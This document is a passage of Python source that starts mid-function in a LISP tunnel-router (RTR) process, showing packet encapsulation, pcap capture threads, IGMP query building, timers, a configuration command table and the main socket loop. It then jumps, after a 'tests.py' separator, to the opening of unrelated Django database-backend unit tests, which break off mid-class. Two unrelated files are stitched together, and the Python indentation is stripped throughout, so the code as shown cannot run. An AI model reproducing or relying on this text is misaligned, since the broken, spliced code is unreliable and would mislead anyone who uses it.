lisp.dprint("Natively forwarding")
packet.send_packet(lisp_raw_socket, packet.inner_dest)
if (packet.is_trace()):
s = lisp_trace_listen_socket
r = "not an EID"
lisp.lisp_trace_append(packet, reason=r, lisp_socket=s)
#endif
lisp_latency_debug(ts, "RTR")
return
#endif
r = "No reachable RLOCs found"
lisp.dprint(r)
if (packet.is_trace()):
s = lisp_trace_listen_socket
lisp.lisp_trace_append(packet, reason=r, lisp_socket=s)
#endif
return
#endif
if (dest_rloc and dest_rloc.is_null()):
lisp.dprint("Drop action RLOC found")
if (packet.is_trace()):
s = lisp_trace_listen_socket
r = "drop action"
lisp.lisp_trace_append(packet, reason=r, lisp_socket=s)
#endif
return
#endif
#
# Setup outer header for either unicast or multicast transmission..
#
packet.outer_tos = packet.inner_tos
packet.outer_ttl = packet.inner_ttl
#
# Do unicast encapsulation.
#
if (dest_rloc):
packet.encap_port = dest_port
if (dest_port == 0): packet.encap_port = lisp.LISP_DATA_PORT
packet.outer_dest.copy_address(dest_rloc)
version = packet.outer_dest.afi_to_version()
packet.outer_version = version
source_rloc = lisp_rtr_source_rloc if (version == 4) else \
lisp.lisp_myrlocs[1]
packet.outer_source.copy_address(source_rloc)
if (packet.is_trace()):
s = lisp_trace_listen_socket
if (lisp.lisp_trace_append(packet, rloc_entry=rloc_entry,
lisp_socket=s) == False): return
#endif
#
# Encode new LISP, UDP, and outer header.
#
if (packet.encode(nonce) == None): return
if (len(packet.packet) <= 1500): packet.print_packet("Send", True)
#
# Send out on raw socket.
#
raw_socket = lisp_raw_v6_socket if version == 6 else lisp_raw_socket
packet.send_packet(raw_socket, packet.outer_dest)
elif (rle):
#
# Do replication of RLE is returned.
#
orig_len = len(packet.packet)
for node in rle.rle_forwarding_list:
packet.outer_dest.copy_address(node.address)
packet.encap_port = lisp.LISP_DATA_PORT if \
node.translated_port == 0 else node.translated_port
version = packet.outer_dest.afi_to_version()
packet.outer_version = version
source_rloc = lisp_rtr_source_rloc if (version == 4) else \
lisp.lisp_myrlocs[1]
packet.outer_source.copy_address(source_rloc)
if (packet.is_trace()):
s = lisp_trace_listen_socket
r = "replicate"
if (lisp.lisp_trace_append(packet, reason=r, lisp_socket=s) \
== False): return
#endif
if (packet.encode(None) == None): return
packet.print_packet("Replicate-to-L{}".format(node.level), True)
packet.send_packet(lisp_raw_socket, packet.outer_dest)
#
# We need to strip the encapsulation header so we can add a new
# one for the next replication.
#
strip_len = len(packet.packet) - orig_len
packet.packet = packet.packet[strip_len::]
if (lisp.lisp_flow_logging): packet = copy.deepcopy(packet)
#endfor
#endif
#
# Don't need packet structure anymore.
#
del(packet)
lisp_latency_debug(ts, "RTR")
return
#enddef
#
# lisp_rtr_worker_thread
#
# This function runs for each thread started.
#
def lisp_rtr_worker_thread(lisp_thread):
lisp.lisp_set_exception()
while (True):
#
# Dequeue packet from pcap's enqueue.
#
packet = lisp_thread.input_queue.get()
#
# Count input packets and bytes.
#
lisp_thread.input_stats.increment(len(packet))
#
# Use pre-defined packet data structure, store packet buffer in it.
#
lisp_thread.lisp_packet.packet = packet
#
# Decap and encap, go, go, go.
#
lisp_rtr_data_plane(lisp_thread.lisp_packet, lisp_thread.thread_name)
#endwhile
return
#enddef
#
# lisp_triage
#
# Decide which RTR thread should process packet. Do a modulus on the timestamp
# to randomly have a single thread process a received packet.
#
def lisp_triage(thread):
seed = (time.time() % thread.number_of_pcap_threads)
return(int(seed) == thread.thread_number)
#enddef
#
# lisp_rtr_pcap_process_packet
#
# Receive LISP encapsulated packet from pcap.loop(). IPC it to ourselves so
# main thread can get access to lisp.lisp_map_cache.
#
def lisp_rtr_pcap_process_packet(parms, not_used, packet):
if (lisp_triage(parms[1]) == False): return
device = parms[0]
lisp_thread = parms[1]
use_workers = lisp_thread.number_of_worker_threads
lisp_thread.input_stats.increment(len(packet))
#
# Jump over MAC header if packet received on interface. There is a 4-byte
# internal header in any case (loopback interfaces will have a 4 byte
# header)..
#
offset = 4 if device == "lo0" else (14 if lisp.lisp_is_macos() else 16)
packet = packet[offset::]
#
# If we are using worker threads, queue packet so they can process packet.
#
if (use_workers):
index = lisp_thread.input_stats.packet_count % use_workers
index = index + (len(lisp_threads) - use_workers)
thread = lisp_threads[index]
thread.input_queue.put(packet)
else:
lisp_thread.lisp_packet.packet = packet
lisp_rtr_data_plane(lisp_thread.lisp_packet, lisp_thread.thread_name)
#endif
return
#enddef
#
# lisp_rtr_pcap_thread
#
# Setup pcap filters for this thread to receive packets in lisps_rtr_pcap_
# process_packet().
#
def lisp_rtr_pcap_thread(lisp_thread):
lisp.lisp_set_exception()
if (lisp.lisp_myrlocs[0] == None): return
device = "lo0" if lisp.lisp_is_macos() else "any"
pcap = pcappy.open_live(device, 9000, 0, 100)
#
# If "lisp-nat = yes" is configured, then a PETR is co-located with this
# RTR functionality. We need to pcap *all* packets (0.0.0.0/0 and 0::/0).
#
lisp_nat = commands.getoutput("egrep 'lisp-nat = yes' ./lisp.config")
lisp_nat = (lisp_nat != "" and lisp_nat[0] == " ")
pfilter = "(dst host "
afilter = ""
for addr in lisp.lisp_get_all_addresses():
pfilter += "{} or ".format(addr)
afilter += "{} or ".format(addr)
#endif
pfilter = pfilter[0:-4]
pfilter += ") and ((udp dst port 4341 or 8472 or 4789) or "
pfilter += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + \
"(ip[6]&0xe0 == 0 and ip[7] != 0))))"
#
# For RLOC-probe messages that come via pcap interface so we have the
# IP header to grab the TTL.
#
afilter = afilter[0:-4]
pfilter += (" or (not (src host {}) and " + \
"((udp src port 4342 and ip[28] == 0x28) or " + \
"(udp dst port 4342 and ip[28] == 0x12)))").format(afilter)
if (lisp_nat):
pfilter += (" or (dst net 0.0.0.0/0 and " + \
"not (host {} or src net 127.0.0.0/8))").format(afilter)
#endif
lisp.lprint("Capturing packets for: '{}'".format(pfilter))
pcap.filter = pfilter
#
# Enter receive loop.
#
pcap.loop(-1, lisp_rtr_pcap_process_packet, [device, lisp_thread])
return
#enddef
#
# lisp_encapsulate_igmp_query
#
# LISP encapsulate an IGMP query to the RLOC of the EID that has joined any
# group.
#
def lisp_encapsulate_igmp_query(lisp_raw_socket, eid, geid, igmp):
#
# Setup fields we need for lisp_packet.encode().
#
packet = lisp.lisp_packet(igmp)
#
# Get RLOC of EID from RLE record.
#
mc = lisp.lisp_map_cache_lookup(eid, geid)
if (mc == None): return
if (mc.rloc_set == []): return
if (mc.rloc_set[0].rle == None): return
eid_name = eid.print_address_no_iid()
for rle_node in mc.rloc_set[0].rle.rle_nodes:
if (rle_node.rloc_name == eid_name):
packet.outer_dest.copy_address(rle_node.address)
packet.encap_port = rle_node.translated_port
break
#endif
#endfor
if (packet.outer_dest.is_null()): return
packet.outer_source.copy_address(lisp.lisp_myrlocs[0])
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 32
packet.inner_source.copy_address(lisp.lisp_myrlocs[0])
packet.inner_dest.store_address("[{}]224.0.0.1".format(geid.instance_id))
packet.inner_ttl = 1
e = lisp.green(eid.print_address(), False)
r = lisp.red("{}:{}".format(packet.outer_dest.print_address_no_iid(),
packet.encap_port), False)
q = lisp.bold("IGMP Query", False)
lisp.lprint("Data encapsulate {} to gleaned EID {}, RLOC {}".format( \
q, e, r))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
packet.send_packet(lisp_raw_socket, packet.outer_dest)
#enddef
#
# lisp_send_igmp_queries
#
# Send General Query to each EID that has joiined groups. The Group Address
# field below is set to 0.0.0.0 and the Number of Sources is set to 0.
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 0x11 | Max Resp Code | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Group Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Resv |S| QRV | QQIC | Number of Sources (N) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source Address [1] |
# +- -+
# . . .
# . . .
# +- -+
# | Source Address [N] |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_send_igmp_queries(lisp_raw_socket):
if (lisp.lisp_gleaned_groups == {}): return
#
# Build an IP header and checksum it. Put Router-Alert option after
# destination address.
#
ip = "\x46\xc0\x00\x24\x00\x00\x40\x00\x01\x02\x00\x00"
myrloc = lisp.lisp_myrlocs[0]
rloc = myrloc.address
ip += chr((rloc >> 24) & 0xff)
ip += chr((rloc >> 16) & 0xff)
ip += chr((rloc >> 8) & 0xff)
ip += chr(rloc & 0xff)
ip += "\xe0\x00\x00\x01"
ip += "\x94\x04\x00\x00"
ip = lisp.lisp_ip_checksum(ip, 24)
#
# Build an IGMP query and checksum it. The mrc is 100 (10 secs), qrv is 2,
# and qqic is 60. Just like cisco would send.
#
igmp = "\x11\x64\x00\x00" + "\x00\x00\x00\x00" + "\x02\x3c\x00\x00"
igmp = lisp.lisp_igmp_checksum(igmp)
#
# Send to EIDs that have joined group and that we have configured to send
# queries to.
#
seid = lisp.lisp_address(lisp.LISP_AFI_IPV4, "", 32, 0)
geid = lisp.lisp_address(lisp.LISP_AFI_IPV4, "", 32, 0)
for eid in lisp.lisp_gleaned_groups:
seid.store_address(eid)
for group in lisp.lisp_gleaned_groups[eid]:
geid.store_address(group)
x, y, query = lisp.lisp_allow_gleaning(seid, geid, None)
if (query == False): continue
lisp_encapsulate_igmp_query(lisp_raw_socket, seid, geid, ip + igmp)
#endfor
#endfor
#enddef
#
# lisp_timeout_gleaned_groups
#
# Go through the lisp_gleaned_groups{} array to see if any timers are older
# than 3 minutes.
#
def lisp_timeout_gleaned_groups():
seid = lisp.lisp_address(lisp.LISP_AFI_IPV4, "", 32, 0)
geid = lisp.lisp_address(lisp.LISP_AFI_IPV4, "", 32, 0)
delete_list = []
for eid in lisp.lisp_gleaned_groups:
for group in lisp.lisp_gleaned_groups[eid]:
last_refresh = lisp.lisp_gleaned_groups[eid][group]
elapsed = time.time() - last_refresh
if (elapsed < lisp.LISP_IGMP_TIMEOUT_INTERVAL): continue
delete_list.append([eid, group])
#endfor
#endfor
#
# Remove from rloc-set and lisp_gleaned_groups (since we are not
# traversing it anymore.
#
to_str = lisp.bold("timed out", False)
for eid, group in delete_list:
seid.store_address(eid)
geid.store_address(group)
e = lisp.green(eid, False)
g = lisp.green(group, False)
lisp.lprint("{} RLE {} for gleaned group {}".format(e, to_str, g))
lisp.lisp_remove_gleaned_multicast(seid, geid)
#endfor
#enddef
#
# lisp_rtr_process_timer
#
# Call general timeout routine to process the RTR map-cache.
#
def lisp_rtr_process_timer(lisp_raw_socket):
lisp.lisp_set_exception()
#
# Remove nonce entries from crypto-list.
#
for keys in lisp.lisp_crypto_keys_by_nonce.values():
for key in keys: del(key)
#endfor
lisp.lisp_crypto_keys_by_nonce.clear()
lisp.lisp_crypto_keys_by_nonce = {}
#
# Walk map-cache.
#
lisp.lisp_timeout_map_cache(lisp.lisp_map_cache)
#
# Clear the LISP-Trace cache so we can optimize memory usage. There is only
# a one-time use for the cahced entries.
#
lisp.lisp_rtr_nat_trace_cache.clear()
lisp.lisp_rtr_nat_trace_cache = {}
#
# Process gleaned groups refresh timer. If IGMP reports have not been
# received, remove RLE from (*,G) and (S,G) map-cache entries.
#
lisp_timeout_gleaned_groups()
#
# Send IGMP queries to gleaned EIDs that have joined groups.
#
lisp_send_igmp_queries(lisp_raw_socket)
#
# Restart periodic timer.
#
lisp_periodic_timer = threading.Timer(60, lisp_rtr_process_timer,
[lisp_raw_socket])
lisp_periodic_timer.start()
return
#enddef
#
# lisp_rtr_startup
#
# Intialize this LISP RTR process. This function returns no values.
#
def lisp_rtr_startup():
global lisp_ipc_listen_socket, lisp_send_sockets, lisp_ephem_listen_socket
global lisp_raw_socket, lisp_raw_v6_socket, lisp_threads
global lisp_ipc_punt_socket, lisp_trace_listen_socket
global lisp_rtr_source_rloc
lisp.lisp_i_am("rtr")
lisp.lisp_set_exception()
lisp.lisp_print_banner("RTR starting up")
#
# Get local address for source RLOC for encapsulation.
#
if (lisp.lisp_get_local_addresses() == False): return(False)
#
# Get interface address for RTR source RLOC if env variable defined. It
# should be the private translatable address from a AWS resident NAT.
#
# Get device name from command line. Some AWS VMs may not have interface
# "eth0" but something like "ens5".
#
lisp_rtr_source_rloc = lisp.lisp_myrlocs[0]
if (lisp.lisp_on_aws()):
aws = lisp.bold("AWS RTR", False)
rloc = None
for device in ["eth0", "ens5"]:
rloc = lisp.lisp_get_interface_address(device)
if (rloc != None): break
#endfor
if (rloc != None):
lisp_rtr_source_rloc = rloc
addr = rloc.print_address_no_iid()
lisp.lprint("{} using RLOC {} on {}".format(aws, addr, device))
else:
addr = lisp_rtr_source_rloc.print_address_no_iid()
lisp.lprint("{} cannot obtain RLOC, using {}".format(aws, addr))
#endif
#endif
#
# Open network send socket and internal listen socket. For an RTR, that
# may be behind a NAT, all Map-Requests are sent with the ephemeral port
# so the Map-Request port and the ECM port will be the same.
#
address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
lisp_ephem_listen_socket = lisp.lisp_open_listen_socket(address,
str(lisp_ephem_port))
lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-rtr")
lisp_ipc_punt_socket = lisp.lisp_open_listen_socket("", "lispers.net-itr")
lisp_send_sockets[0] = lisp_ephem_listen_socket
# lisp_send_sockets[0] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV4)
lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
lisp_send_sockets[2] = lisp_ipc_listen_socket
#
# Open up raw socket so we can send with IP headers after decapsulation.
# There is a special case where the RTR's lisp_send_sockets array is of
# size 4 since we need to pass the raw socket through the lisp.py module
# to send a data encapsulated RLOC-probe to an ETR that sits behind a NAT.
# The test is in lisp_send_map_request() for this. This is the case in
# ETRs as well. All other components use an array size of 3 modulo.
#
lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_RAW)
lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
lisp_send_sockets.append(lisp_raw_socket)
#
# Open up a listen socket on the LISP-Trace port so the RTR can cache
# translated RLOC information from an ltr client program.
#
lisp_trace_listen_socket = lisp.lisp_open_listen_socket("0.0.0.0",
str(lisp.LISP_TRACE_PORT))
if (lisp.lisp_is_raspbian() == False):
lisp_raw_v6_socket = socket.socket(socket.AF_INET6, socket.SOCK_RAW,
socket.IPPROTO_UDP)
#endif
pcap_threads = os.getenv("LISP_PCAP_THREADS")
pcap_threads = 1 if (pcap_threads == None) else int(pcap_threads)
worker_threads = os.getenv("LISP_WORKER_THREADS")
worker_threads = 0 if (worker_threads == None) else int(worker_threads)
#
# Setup packet capture.
#
for i in range(pcap_threads):
t = lisp.lisp_thread("pcap-{}".format(i))
t.thread_number = i
t.number_of_pcap_threads = pcap_threads
t.number_of_worker_threads = worker_threads
lisp_threads.append(t)
threading.Thread(target=lisp_rtr_pcap_thread, args=[t]).start()
#endif
#
# Start worker threads. If you want to change the number of them, only
# this constant needs changing.
#
for i in range(worker_threads):
t = lisp.lisp_thread("worker-{}".format(i))
lisp_threads.append(t)
threading.Thread(target=lisp_rtr_worker_thread, args=[t]).start()
#endfor
#
# Load map-cache from checkpoint file before we start writing to it.
#
lisp.lisp_load_checkpoint()
#
# Should we load-split pings?
#
lisp.lisp_load_split_pings = (os.getenv("LISP_LOAD_SPLIT_PINGS") != None)
#
# Start map-cache timeout timer.
#
lisp_periodic_timer = threading.Timer(60, lisp_rtr_process_timer,
[lisp_raw_socket])
lisp_periodic_timer.start()
return(True)
#enddef
#
# lisp_rtr_shutdown
#
# Shut down this process.
#
def lisp_rtr_shutdown():
#
# Close sockets.
#
lisp.lisp_close_socket(lisp_send_sockets[0], "")
lisp.lisp_close_socket(lisp_send_sockets[1], "")
lisp.lisp_close_socket(lisp_ipc_listen_socket, "lisp-rtr")
lisp.lisp_close_socket(lisp_ephem_listen_socket, "")
lisp.lisp_close_socket(lisp_trace_listen_socket, "")
lisp.lisp_close_socket(lisp_ipc_punt_socket, "lispers.net-itr")
lisp_raw_socket.close()
return
#enddef
#
# lisp_rtr_map_resolver_command
#
# Call lispconfig.lisp_map_resolver_command and set "test-mr" timer.
#
def lisp_rtr_map_resolver_command(kv_pair):
global lisp_send_sockets
global lisp_ephem_port
lispconfig.lisp_map_resolver_command(kv_pair)
if (lisp.lisp_test_mr_timer == None or
lisp.lisp_test_mr_timer.is_alive() == False):
lisp.lisp_test_mr_timer = threading.Timer(2, lisp.lisp_test_mr,
[lisp_send_sockets, lisp_ephem_port])
lisp.lisp_test_mr_timer.start()
#endif
return
#enddef
#
# lisp_rtr_xtr_command
#
# Call lispconfig.lisp_xtr_command() but pass socket parameters to starting
# the RLOC-probing timer if "rloc-probing = yes".
#
def lisp_rtr_xtr_command(kv_pair):
global lisp_ephem_listen_socket, lisp_raw_socket, lisp_ephem_port
rloc_probing = lisp.lisp_rloc_probing
#
# Execute command.
#
lispconfig.lisp_xtr_command(kv_pair)
#
# Trigger if "rloc-probing = yes" just happened and it was previously
# set to "no".
#
if (rloc_probing == False and lisp.lisp_rloc_probing):
lisp_sockets = [lisp_ephem_listen_socket, lisp_ephem_listen_socket,
None, lisp_raw_socket]
lisp.lisp_start_rloc_probe_timer(1, lisp_sockets)
entry = { "type" : "itr-crypto-port", "port" : lisp_ephem_port }
lisp.lisp_write_to_dp_socket(entry)
#endif
#
# Write to external data-plane if enabled.
#
lisp.lisp_ipc_write_xtr_parameters(lisp.lisp_debug_logging,
lisp.lisp_data_plane_logging)
return
#enddef
#
# RTR commands processed by this process.
#
lisp_rtr_commands = {
"lisp xtr-parameters" : [lisp_rtr_xtr_command, {
"rloc-probing" : [True, "yes", "no"],
"nonce-echoing" : [True, "yes", "no"],
"data-plane-security" : [True, "yes", "no"],
"data-plane-logging" : [True, "yes", "no"],
"frame-logging" : [True, "yes", "no"],
"flow-logging" : [True, "yes", "no"],
"nat-traversal" : [True, "yes", "no"],
"checkpoint-map-cache" : [True, "yes", "no"],
"ipc-data-plane" : [True, "yes", "no"],
"decentralized-push-xtr" : [True, "yes", "no"],
"decentralized-pull-xtr-modulus" : [True, 1, 0xff],
"decentralized-pull-xtr-dns-suffix" : [True],
"register-reachable-rtrs" : [True, "yes", "no"],
"program-hardware" : [True, "yes", "no"] }],
"lisp interface" : [lispconfig.lisp_interface_command, {
"interface-name" : [True],
"device" : [True],
"instance-id" : [True, 0, 0xffffffff],
"dynamic-eid" : [True],
"dynamic-eid-device" : [True],
"lisp-nat" : [True, "yes", "no"],
"dynamic-eid-timeout" : [True, 0, 0xff] }],
"lisp map-resolver" : [lisp_rtr_map_resolver_command, {
"mr-name" : [True],
"ms-name" : [True],
"dns-name" : [True],
"address" : [True] }],
"lisp map-cache" : [lispconfig.lisp_map_cache_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"send-map-request" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"rle-name" : [True],
"elp-name" : [True],
"address" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp rtr-map-cache" : [lispconfig.lisp_map_cache_command, {
"prefix" : [],
"instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"rloc" : [],
"rloc-record-name" : [True],
"rle-name" : [True],
"elp-name" : [True],
"address" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp explicit-locator-path" : [lispconfig.lisp_elp_command, {
"elp-name" : [False],
"elp-node" : [],
"address" : [True],
"probe" : [True, "yes", "no"],
"strict" : [True, "yes", "no"],
"eid" : [True, "yes", "no"] }],
"lisp replication-list-entry" : [lispconfig.lisp_rle_command, {
"rle-name" : [False],
"rle-node" : [],
"address" : [True],
"level" : [True, 0, 255] }],
"lisp json" : [lispconfig.lisp_json_command, {
"json-name" : [False],
"json-string" : [False] }],
"lisp database-mapping" : [lisp_rtr_database_mapping_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"secondary-instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"dynamic-eid" : [True, "yes", "no"],
"signature-eid" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"address" : [True],
"interface" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp glean-mapping" : [lisp_rtr_glean_mapping_command, {
"instance-id" : [False],
"eid-prefix" : [True],
"group-prefix" : [True],
"rloc-prefix" : [True],
"rloc-probe" : [True, "yes", "no"],
"igmp-query" : [True, "yes", "no"] }],
"show rtr-rloc-probing" : [lisp_rtr_show_rloc_probe_command, { }],
"show rtr-keys" : [lisp_rtr_show_keys_command, {}],
"show rtr-map-cache" : [lisp_rtr_show_command, {}],
"show rtr-map-cache-dns" : [lisp_rtr_show_command_dns, {}]
}
#
# lisp_rtr_process_trace_packet
#
# Process RLOC-based LISP-Trace message.
#
def lisp_rtr_process_trace_packet(lisp_socket):
#
# Read from listen socket for port 2434 and parse LISP-Trace packet.
#
opcode, source, port, packet = lisp.lisp_receive(lisp_socket, False)
trace = lisp.lisp_trace()
if (trace.decode(packet) == False): return
#
# Cache the translated information. Will use local addressing info to
# find translated information in lisp_trace_append().
#
trace.rtr_cache_nat_trace(source, port)
#enddef
#------------------------------------------------------------------------------
#
# Main entry point for process.
#
if (lisp_rtr_startup() == False):
lisp.lprint("lisp_rtr_startup() failed")
lisp.lisp_print_banner("RTR abnormal exit")
exit(1)
#endif
socket_list = [lisp_ephem_listen_socket, lisp_ipc_listen_socket,
lisp_ipc_punt_socket, lisp_trace_listen_socket]
ephem_sockets = [lisp_ephem_listen_socket] * 3
while (True):
try: ready_list, w, x = select.select(socket_list, [], [])
except: break
#
# Process Punt signal message from another data-plane (snabb).
#
if (lisp.lisp_ipc_data_plane and lisp_ipc_punt_socket in ready_list):
lisp.lisp_process_punt(lisp_ipc_punt_socket, lisp_send_sockets,
lisp_ephem_port)
#endif
#
# LISP-TRACE messages coming from an ltr client program.
#
if (lisp_trace_listen_socket in ready_list):
lisp_rtr_process_trace_packet(lisp_trace_listen_socket)
#endif
#
# Process Map-Reply messages received on ephemeral port.
#
if (lisp_ephem_listen_socket in ready_list):
opcode, source, port, packet = lisp.lisp_receive(ephem_sockets[0],
False)
if (source == ""): break
if (lisp.lisp_is_rloc_probe_request(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
continue
#endif
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
continue
#endif
lisp.lisp_parse_packet(ephem_sockets, packet, source, port)
#endif
#
# Process either commands, an IPC data-packet (for testing), or any
# protocol message on the IPC listen socket..
#
if (lisp_ipc_listen_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ipc_listen_socket, True)
if (source == ""): break
if (opcode == "command"):
if (packet == "clear"):
lisp.lisp_clear_map_cache()
continue
#endif
if (packet.find("clear%") != -1):
lispconfig.lisp_clear_decap_stats(packet)
continue
#endif
lispconfig.lisp_process_command(lisp_ipc_listen_socket, opcode,
packet, "lisp-rtr", [lisp_rtr_commands])
elif (opcode == "api"):
lisp.lisp_process_api("lisp-rtr", lisp_ipc_listen_socket, packet)
elif (opcode == "data-packet"):
lisp_rtr_data_plane(packet, "")
else:
if (lisp.lisp_is_rloc_probe_request(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
continue
#endif
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
continue
#endif
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
#endif
#endif
#endwhile
lisp_rtr_shutdown()
lisp.lisp_print_banner("RTR normal exit")
exit(0)
#------------------------------------------------------------------------------
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import unicode_literals
import copy
import datetime
import re
import threading
import unittest
import warnings
from decimal import Decimal, Rounded
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import no_style
from django.db import (
DEFAULT_DB_ALIAS, DatabaseError, IntegrityError, connection, connections,
reset_queries, transaction,
)
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.postgresql_psycopg2 import version as pg_version
from django.db.backends.signals import connection_created
from django.db.backends.utils import CursorWrapper, format_number
from django.db.models import Avg, StdDev, Sum, Variance
from django.db.models.sql.constants import CURSOR
from django.db.utils import ConnectionHandler
from django.test import (
TestCase, TransactionTestCase, mock, override_settings, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.test.utils import ignore_warnings, str_prefix
from django.utils import six
from django.utils.deprecation import RemovedInDjango19Warning
from django.utils.six.moves import range
from . import models
class DummyBackendTest(TestCase):
def test_no_databases(self):
"""
Test that empty DATABASES setting default to the dummy backend.
"""
DATABASES = {}
conns = ConnectionHandler(DATABASES)
self.assertEqual(conns[DEFAULT_DB_ALIAS].settings_dict['ENGINE'],
'django.db.backends.dummy')
with self.assertRaises(ImproperlyConfigured):
conns[DEFAULT_DB_ALIAS].ensure_connection()
@unittest.skipUnless(connection.vendor == 'oracle', "Test only for Oracle")
class OracleTests(unittest.TestCase):
def test_quote_name(self):
# Check that '%' chars are escaped for query execution.
name = '"SOME%NAME"'
quoted_name = connection.ops.quote_name(name)
self.assertEqual(quoted_name % (), name)
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
from django.db.backends.oracle.base import convert_unicode
with connection.cursor() as cursor:
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!')])
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
from django.db.backends.oracle.base import Database
with connection.cursor() as cursor:
var = cursor.var(Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
with connection.cursor() as cursor:
cursor.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join(six.text_type(x) for x in range(4000))
cursor.execute('INSERT INTO ltext VALUES (%s)', [long_str])
cursor.execute('SELECT text FROM ltext')
row = cursor.fetchone()
self.assertEqual(long_str, row[0].read())
cursor.execute('DROP TABLE ltext')
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.ensure_connection()
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
def test_order_of_nls_parameters(self):
# an 'almost right' datetime should work with configured
# NLS parameters as per #18465.
with connection.cursor() as cursor:
query = "select 1 from dual where '1936-12-29 00:00' < sysdate"
# Test that the query succeeds without errors - pre #18465 this
# wasn't the case.
cursor.execute(query)
self.assertEqual(cursor.fetchone()[0], 1)
@unittest.skipUnless(connection.vendor == 'sqlite', "Test only for SQLite")
class SQLiteTests(TestCase):
longMessage = True
def test_autoincrement(self):
"""
Check that auto_increment fields are created with the AUTOINCREMENT
keyword in order to be monotonically increasing. Refs #10164.
"""
with connection.schema_editor(collect_sql=True) as editor:
editor.create_model(models.Square)
statements = editor.collected_sql
match = re.search('"id" ([^,]+),', statements[0])
self.assertIsNotNone(match)
self.assertEqual('integer NOT NULL PRIMARY KEY AUTOINCREMENT',
match.group(1), "Wrong SQL used to create an auto-increment "
"column on SQLite")
def test_aggregation(self):
"""
#19360: Raise NotImplementedError when aggregating on date/time fields.
"""
for aggregate in (Sum, Avg, Variance, StdDev):
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('time'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('date'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('last_modified'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate,
**{'complex': aggregate('last_modified') + aggregate('last_modified')})
@unittest.skipUnless(connection.vendor == 'postgresql', "Test only for PostgreSQL")
class PostgreSQLTests(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 9.3 beta4", 90300)
self.assert_parses("PostgreSQL 9.3", 90300)
self.assert_parses("EnterpriseDB 9.3", 90300)
self.assert_parses("PostgreSQL 9.3.6", 90306)
self.assert_parses("PostgreSQL 9.4beta1", 90400)
self.assert_parses("PostgreSQL 9.3.1 on i386-apple-darwin9.2.2, compiled by GCC i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)", 90301)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
